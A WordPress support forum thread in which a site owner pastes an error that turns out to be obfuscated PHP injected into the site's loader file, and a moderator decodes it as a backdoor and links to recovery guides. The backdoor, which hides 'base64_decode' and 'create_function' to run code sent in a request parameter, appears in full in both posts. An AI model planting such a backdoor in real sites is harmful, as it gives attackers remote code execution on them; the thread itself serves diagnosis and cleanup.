Support » Fixing WordPress » Error Message when Visiting Site

  • I’m usually really good at going into the file manager on my godaddy account and fixing loading errors like this, but I am at a loss to know what to do here.

    Can someone help?

    Here is the error I get when visiting the page:

    if(isset($_REQUEST[‘sort’])){ $string = $_REQUEST[‘sort’]; $array_name = ”; $alphabet = “wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2”; $ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7); foreach($ar as $t){ $array_name .= $alphabet[$t]; } $a = strrev(“noi”.”tcnuf”.”_eta”.”erc”); $f = $a(“”, $array_name($string)); // MALWARE $f(); exit(); } /** * Loads the WordPress environment and template. * * @package WordPress */ if ( !isset($wp_did_header) ) { $wp_did_header = true; // Load the WordPress library. require_once( dirname(__FILE__) . ‘/wp-load.php’ ); // Set up the WordPress query. wp(); // Load the theme template. require_once( ABSPATH . WPINC . ‘/template-loader.php’ ); }

    The page I need help with: [log in to see the link]

Viewing 2 replies - 1 through 2 (of 2 total)
  • Moderator t-p

    (@t-p)

    What did you do before this error happened?

    I am afraid that the code fragment you posted shows really suspect code, code that IMHX would never have a legit role in a website. I suspect that this code is only being shown because of another error. The code as I decode it is in part:

    if(isset($_REQUEST[‘sort’])){
     $string = $_REQUEST[‘sort’];
     $array_name = ”;
     $alphabet = “wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2”;
    #          1111111111222222222233333333334444444444
    #01234567890123456789012345678901234567890123456789
    #wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2
     $ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7);
    #            b  a  s e 6 4  _  d e  c  o  d e
     foreach($ar as $t){
    	 $array_name .= $alphabet[$t];
     }
    #$array_name = base64_decode
     $a = strrev(“noi”.”tcnuf”.”_eta”.”erc”);
    #$a = create_function
     $f = $a(“”, $array_name($string));
    # $f = function("", base64_decode($_REQUEST[‘sort’]));
    

    Creating a function using base64_decode content is a very suspicious thing, the elaborate code used to conceal the base64 and “function” is indicative that scrutiny is feared.

    So I am afraid that your website has been hacked.
    Keep calm and follow these docs:
    https://codex.wordpress.org/FAQ_My_site_was_hacked
    https://codex.wordpress.org/Hardening_WordPress

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Error Message when Visiting Site’ is closed to new replies.